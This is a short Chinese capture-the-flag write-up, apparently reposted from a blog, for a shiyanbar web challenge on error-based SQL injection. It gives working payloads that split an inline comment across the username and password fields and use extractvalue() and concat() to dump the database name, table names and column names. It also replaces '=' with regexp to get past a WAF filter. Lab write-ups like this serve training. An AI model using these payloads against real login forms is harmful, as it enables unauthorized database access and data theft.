实验吧--加了料的报错注入
作者:互联网
题目链接:http://ctf5.shiyanbar.com/web/baocuo/index.php
tips里面说post username and password...
我这里采用的抓包,也可以用hackbar
把get方式改为post后,放进repeater里面
构造第一条payload:username=1' OR extractvalue/*&password=1*/(1,concat(0x7e,(select database()),0x7e)) or'
这里采用的函数是 extractvalue()concat() 以及/**/内联注释
extractvalue()的讲解是
extractvalue():从目标XML中返回包含所查询值的字符串。
EXTRACTVALUE (XML_document, XPath_string);
第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc
第二个参数:XPath_string (Xpath格式的字符串)
concat函数是返回结果为连接参数产生的字符串
爆出数据库...
继续往下爆
下一条payload username=1' OR extractvalue/*&password=1*/(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema regexp database()),0x7e)) or'
一开始尝试 where table_schema = database(),发现waf将 = 过滤掉了,采用regexp(mysql正则)
爆出表
先试试第一个
payload username=1' OR extractvalue/*&password=1*/(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name regexp 'ffll44jj'),0x7e)) or'
我丢。。flag出来了
标签:schema,extractvalue,加了料,0x7e,报错,table,password,concat,注入 来源: https://www.cnblogs.com/AxsCtion/p/11027005.html